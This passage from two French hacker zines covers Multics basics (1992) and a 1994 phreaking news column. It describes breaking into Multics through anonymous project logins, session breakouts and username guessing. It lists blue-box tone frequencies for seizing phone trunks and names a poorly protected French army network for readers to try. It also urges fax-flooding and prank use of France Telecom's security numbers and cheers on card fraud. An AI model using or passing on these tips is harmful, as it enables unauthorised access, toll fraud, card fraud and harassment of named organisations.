  4417. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4418. = CORE-DUMP    Issue 1        Phile 5        [NeurAlien]     14/01/92   =
  4419. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4420.  
  4421.  
  4422.             $£$£$£$£$£$£$£$£$£$£$£$£$£$£$£$
  4423.                $$                             $$
  4424.               $$     Multics par NeurAlien     $$
  4425.                $$                             $$
  4426.             $£$£$£$£$£$£$£$£$£$£$£$£$£$£$£$
  4427.  
  4428.  
  4429.   Multics est encore un de ces OS depasses, vieux, obsoletes mais encore
  4430. vivant sur quelques coins retires, hameaux eloignes et ruraux de la
  4431. technopolis galopante que sont actuellement nos grands centre informatiques.
  4432. Les derniers Multics dont j'ai eu connaissance etaient a l'Universite de
  4433. Calgary au Canada, l'INRIA de Rocquencourt en France, Le CIRIL en France qui
  4434. a ete remplace lors de l'ete 1991 par un HP9000 et le CICT toujours en France.
  4435. (et puis aussi: Le ministere de la Culture et l'INRA.)
  4436. Multics est la source d'Unix. C'est un peu comme le pere d'Unix.
  4437. C'est un systeme tres lourds a gerer mais d'un efficacite, d'une fiabilite,
  4438. d'une organisation et d'une praticite telle que l'on se demande pourquoi
  4439. cet OS disparait. En effet, cet OS est certainnement un des meilleurs OS
  4440. developpe jusqu'a maintenant. La derniere version de Multics dont j'ai ete
  4441. temoins est la 12.0 je crois.
  4442.  
  4443. Le systeme est tres vaste donc ce texte ne sera qu'une presentation de
  4444. Multics.
  4445.  
  4446. 1 Reconnaitre un Multics:
  4447. ------------------------
  4448. Au login, la pluspart du temps, quand on se connecte sur un Multics, il
  4449. affiche:
  4450. <system> MULTICS version MRxx        # où xx est le numero de la version
  4451. Channel dhyyy at hhmm.s            # yyy : canal de communication
  4452.                     # hhmm.s : heure format militaire
  4453. up since hhmm.s                # date du dernier boot.
  4454. quelques autres informations et puis plus rien:
  4455. c'est la periode de prelogin.
  4456.  
  4457. 1.1 Prelogin:
  4458. ------------
  4459.    Si vous connaissez les Cyber de Control Data Corporation comme les CDC960,
  4460. CDC980 etc... Ils sont sous NOS/VE et ont comme pour le Multics, une periode
  4461. de prelogin.
  4462. Celle ci est generalement limitee (environ a 2mn).
  4463. Le prelogin comporte plusieurs commandes primaires sous Multics:
  4464. help
  4465. l
  4466. et d'autres commandes de login anonyme sous un projet.
  4467.  
  4468. En effet, la gestion des utilisateurs sous MULTICS se fait par projet.
  4469. Il y a un responsable de projet qui dirige un groupe d'utilisateurs au point
  4470. de vue gestion. On designe un compte comme cela:
  4471. <Username>.<PROJECT>
  4472. Ainsi, lors du login, on peut soit taper le nom en entier, soit taper juste
  4473. le <Username>. Dans le dernier cas, le programme de login va detecter a quel
  4474. projet appartient cet utilisateur.
  4475.  
  4476. Une fonction interessante est la fonction de login anonyme.
  4477. En connaissant juste le nom d'un projet, on peut se logger anonymement sous ce
  4478. projet.
  4479. La syntaxe de cette commande est donnee au prelogin par le message de la
  4480. commande help.
  4481.  
  4482. 1.2 Les principes:
  4483. -----------------
  4484. * Un utilisateur a toujours un nom qui commence par une majuscule. Ce compte
  4485.   fait toujours partie d'un groupe appele 'projet'. On peut donc se logger
  4486.   anonymement sous un projet sans avoir de nom de compte. On sera donc
  4487.   identifie comme anonyme du projet xxxxx.
  4488.   Un user peut faire partie de plusieurs projets.
  4489. * Le nom du projet xxxxx doit avoir pour premiere lettre une majuscule.
  4490. * Un 'segment' est le nom donne sous multics aux fichiers.
  4491. * un chemin est indique non pas avec des slash ('/') comme sous unix mais
  4492.   avec des signes superieur: '>'
  4493.   ex: >udd>PROJET>User
  4494. * le directory >udd> est le directory qui contient toutes les infos concernant
  4495.   le utilisateurs.
  4496. * Se deplacer dans l'arborescence:
  4497.   Si l'on est dans le directory: '>udd>PROJET1' et que l'on veut aller dans
  4498.   '>udd', il suffit te taper 'cwd <'.
  4499.   Si l'on est dans '>udd>PROJET1' et que l'on veut aller dans
  4500.   '>udd>PROJET2>user1', il faut taper:
  4501.   cwd <user1
  4502. * Dans la logique Multics, < equivaut a .. sous Unix et sous DOS (peurk...
  4503.   je parle encore de cet OS pourri, le DOS.... bouhhh)
  4504.  
  4505. 1.3 Les commandes:
  4506. -----------------
  4507. Voici une liste simple et absolument non exhaustive des commandes de multics;
  4508. ce sont les principales.
  4509. help <topic>    : aide en ligne
  4510. ls        : liste des fichiers sur directory courant
  4511. cwd <path>    : pwd afficher le nom du directory courant
  4512. cd <newpath>    : creer un nouveau directory dans le directory courant
  4513. dl <sedgment>    : effacer un segment
  4514. who        : affiche un court message sur l'etat de la machine et affiche
  4515.           la liste des users actuellements connectes sur la machine.
  4516. whom        : meme chose mais en classant les utilisateurs par projets.
  4517. sm        : envoyer un message a un utilisateur online (equivalent a
  4518.           write sous unix).
  4519. sdm        : envoyer un courrier a un utilisateur.
  4520.           Si la machine est connectee a un reseau comme Internet,
  4521.           pour envoyer un mail a scc@nic.ddn.mil, il faut taper:
  4522.           sdm scc -at nic.ddn.mil
  4523. rdm        : lire sa boite aux lettres.
  4524. memo        : systeme d'agenda tres evolue.
  4525. pr        : affiche un segment a l'ecran.
  4526. ted        : editeur ligne a ligne type ED.
  4527. emacs        : editeur pleine page que vous connaissez.
  4528.           l'utilisation de cet editeur est impossible avec une
  4529.           liaison 7 bits. Il faut une liaison 8 bit pour utiliser ca!
  4530. basic        : appel du compilateur basic.
  4531. pascal        : appel du compilateur pascal.
  4532. calendar    : affichage de calendrier.
  4533. date        : affiche la date.
  4534. time        : affiche l'heure.
  4535. st <filename>    : affiche le statut d'un segment ou d'un directory.
  4536. la        : liste des droits d'acces sur un segment ou un directory.
  4537. sa        : etablit les droits d'acces sur un segment ou un directory.
  4538. logout        : quitter Multics.
  4539. crossnet    : envoyer du mail a travers differents réseaux.
  4540.  
  4541. 2 Subversion:
  4542. ------------
  4543.      Par la methode de login anonymous, nous pouvont subvertir MULTICS en
  4544. reperant par un acces public qui est sous un certain projet.
  4545. Par exemple, pour l'interogation d'une bibliotheque ou d'un guide approfondi,
  4546. MULTICS affiche en debut de connexion des infos dont le projet.
  4547. Il suffit ensuite de faire un login anonyme sur ce projet.
  4548.  
  4549.      Deuxieme methode.
  4550. Lors d'une connexion dirigee comme decrite precedemment, il faut stopper le
  4551. programme.
  4552. Pour cela on utilisera CONTROL+Z ou CONTROL+Q ou CONTROL+S ou CONTROL+D
  4553. ou CONTROL+D ou tout simplement un BREAK ou si vous avez un ATTN.
  4554. Ensuite, par la commande 'pi', on peut recuperer un interpreteur de commande.
  4555.  
  4556.      Methode traditionnelle:
  4557. Eh bien, ca vous connaissez... TRY !!!! (in harlem brown.... ;-) private joke)
  4558. N'oubliez jamais que le permier caractere de Username doit toujours etre en
  4559. majuscule. Essayez les entrees communes.
  4560. ex: SysDaemon (celui ci, je l'ai jamais vu 'open')
  4561.  
  4562. 3 Then... the end:
  4563. -----------------
  4564. Bon, j'avoue que ce texte est laconique mais ce systeme est tellement complet
  4565. et tellement peu repandu, que ce serait de la perte de temps de vous expliquer
  4566. tout si vous n'avez pas de becanne pour tester.
  4567.  
  4568. So long HPC[A]s men.
  4569.  
  4570.  
  4571.                                -%!% N0 Way %!%-
  4572.  
  4573.                       Volume I,   Numéro 3,  Partie 3.18
  4574.  
  4575.  
  4576.                      :) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
  4577.                      ?)          Tel - Trixx           |)
  4578.                      @)              By                %)
  4579.                      B)           NeurAlien            I)
  4580.                      :) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
  4581.  
  4582.                                       -
  4583.                                7 Septembre 1994
  4584.                                       -
  4585.    "A new race of hacker seems to be born, Ultimate Hackers"   --Anonymous
  4586.  
  4587.  
  4588.       Hohe les Hack/phreakERS, les telcos évoluent et nous aussi. En exclusivité
  4589. quelques news d'un peu partout dans le monde qui vont vous faire sauter au
  4590. plafond.
  4591.  
  4592.  Tout d'abord la HOPE (Hacking On Planet Earth) s'est déroulée dans le chaos le
  4593. plus complet.  Il y avait beaucoup de "well known hackers" et quelques
  4594. évennements interressants s'y sont déroulés.
  4595. (Knight Lightning & Taran King molestent (tentent tout au moins) une fille
  4596. pendant qu'ils discutent avec Win Schwartau et Agent Steal)
  4597.  L'unix mis a disposition des participant a été hacké comme on pouvait s'y
  4598. attendre.
  4599. ("Hey Razor, have a look at them... It could help...
  4600. - Why?? I haven't been hacked... No... NOOOOOOOOOO... NOoOOoOooOoOO!!! You
  4601.   hacked my system?")
  4602.  Le nouveau systeme du métro de new york qui constituait le deuxième défi aux
  4603. hackers a lui aussi été vaicu.  Il paraitrait (je ne l'ai pas vu) que la
  4604. personne l'ayant hacké soit actuellement recherchée. :)
  4605. (Fucking Pigz, GET A LIFE ! )
  4606.  
  4607.  Au niveau des * Boxes, ca a fonctionné dur apparemment dans une folie
  4608. démoniaque.  Certains pays semblent avoir été ouverts et une effervescence chez
  4609. les phone phreaks semble confirmer les bruits de grands "breakthrough" en
  4610. matière de phreaking. (R2 etc...)
  4611.  
  4612.  Le X25 semblait mort, SevenUp nous dit le contraire: plusieurs centaines
  4613. d'appels par semaine sur SecTec.  La nostalgie des anciens fait toujours peur
  4614. aux admins pour leur facture X25. (Hey Dale Drew, GET A LIFE !)
  4615.  
  4616.  Allez, un ptit amuse gueule pour les lecteurs de N0 Way:
  4617. Frequences pour la malaisie:
  4618. Key Forward: 2600 + 2400 Hz : 150 ms
  4619. Between: 2000 ms
  4620. Seize: 2400 Hz : 150 ms
  4621. Intervals: 150 ms
  4622.  
  4623. CCITT5:
  4624. ======
  4625. Tiens, info de nos amis de Hollande j'ai nomme Hack-Tic:
  4626. CCITT 5 serait utilisé au : Chili,
  4627.                             Philippines
  4628.                             South Africa
  4629.                             Colombie
  4630.                             Bresil
  4631. Essayez pour voir si ca passe...
  4632.  
  4633. Bribes récoltées un peu partout:
  4634. ===============================
  4635. Saviez vous que GN Navetel fournit à la gendarmerie Canadienne des solutions
  4636. pour ecouter les transmissions de données et plus particulierement:
  4637. - les comms modems sur les BBS jusqu'au vitesse 28800.
  4638. - les comms satellites vers Taiwan & Singapour envoyées à 2Mbit/s aux
  4639.   satellites par des "emissaires" de ces pays.
  4640.  
  4641. Afrique du Sud:
  4642. ==============
  4643. 2400/2600 puis 2400
  4644. Timings: 150/0/90/0 toujours en ms bien sûr
  4645.  
  4646. Chili:
  4647. =====
  4648. 2400 ou 2550 pendant 3 secondes
  4649. seize: 2400 (ou 2460)
  4650.  
  4651. The recent hack:
  4652. ===============
  4653. Net23 viens de se faire pirater. Net23 est un bon IP provider à New York.
  4654. Son administrateur qui a juste 15 ans était plutot vert.  Well... qu'est ce qui
  4655. a pris aux hackers de lui modifier son kernel, de lui enlever netstat et ps?
  4656. Bref... pas kewl pour lui.
  4657.  
  4658. R2:
  4659. ==
  4660. Pour seize'r un trunk en R2, il faut envoyer:
  4661. 2040/2400               OU      2400/2400
  4662.      ou                 ==           ou
  4663.      2280                            2280
  4664.      ou                              ou
  4665.      3000                            3000
  4666.  
  4667. Nouvelles de l'armée:
  4668. ====================
  4669. L'armée francaise a un beau reseau TCP/IP interne.  C'est tres joli et c'est
  4670. dur d'y acceder.  Mais alors, c'est COMPLETEMENT NUL AU NIVEAU PROTECTION:
  4671. des entrees avec root sans mot de passe!
  4672. tftp actif sur toutes les machines !
  4673. rexd en standard sur tous les HP.
  4674. Vous voulez vous marrer, essayez de votre caserne preférée ! :)
  4675.  
  4676. Quelqu'un à faire chier:
  4677. =======================
  4678. Service de securité de chez... FT:
  4679. Tel: (1) 44 44 22 22
  4680. Fax: (1) 42 68 19 38
  4681. Vous avez mon approbation pour donner le 44 44 22 22 comme numéro a vérifier
  4682. pour les achats par carte bleue ou numéro de rappel pour France Telecom pour
  4683. les renseignements quand vous etes dans une cabine.
  4684. Je suis aussi d'accord avec le fait que vous utilisiez votre fax modem pour
  4685. envoyer 450 pages NOIRES au 42 68 19 38 !
  4686.  
  4687. La blague du jour:
  4688. =================
  4689. "Comment transforme t'on un 486 en un 8088?"
  4690. "- En installant windows."
  4691. [Kopyrite Phrack 46]
  4692.  
  4693. Mag stripe Reader / Coder:
  4694. =========================
  4695. Beaucoup de personnes recherches des lecteurs encodeurs de cartes magnétiques.
  4696. Voila ou les acheter...
  4697. CPU ADvance
  4698. Post Office Box 2434
  4699. Harwood Station
  4700. Littletown, MA 01460
  4701. USA
  4702. Fax: 508-624-4819
  4703.  
  4704. L'unité coute 389 $ US et il y a 2 modeles:
  4705. un lecteur pr les pistes ISO 1 & 2
  4706. un autre pour les pistes ISO 2 & 3
  4707. Hehe.... Bon carding...
  4708.  
  4709. N0 Way recrute:
  4710. ==============
  4711. Si la nuit vous revez (a part les trucs crades) aux catas, aux reseaux, aux
  4712. ordis, a la chasse aux inspecteurs, au trashing, a l'escalade des batiments de
  4713. FT.
  4714. Si votre oreiller est un Cisco 7000.
  4715. Si vous avez chez vous une antenne parabolique de 4 m de diametre motorisee
  4716. pour suivre les satellites de l'armee.
  4717. Si vous ne vous servez que d'une socket en raw IP pour faire du RPC.
  4718. Si vous vous servez de votre cafetiere pour faire des pates au café ;).
  4719. Si vous aimez router vous memes vos paquets en Source Routing.
  4720. Si vous etes né dans une éprouvette de LSD 25.
  4721.  
  4722. Alors nous avons besoin de vous pour ecrire des article dans N0 Way sur les
  4723. trucs les plus délirant, les plus techniques et les plus éclatants.
  4724.  
  4725. ! Have phun wif that !                                  ++NeurAlien
  4726.  
  4727. On to the next one, on to the next one ! ! !   ++N.
  4728.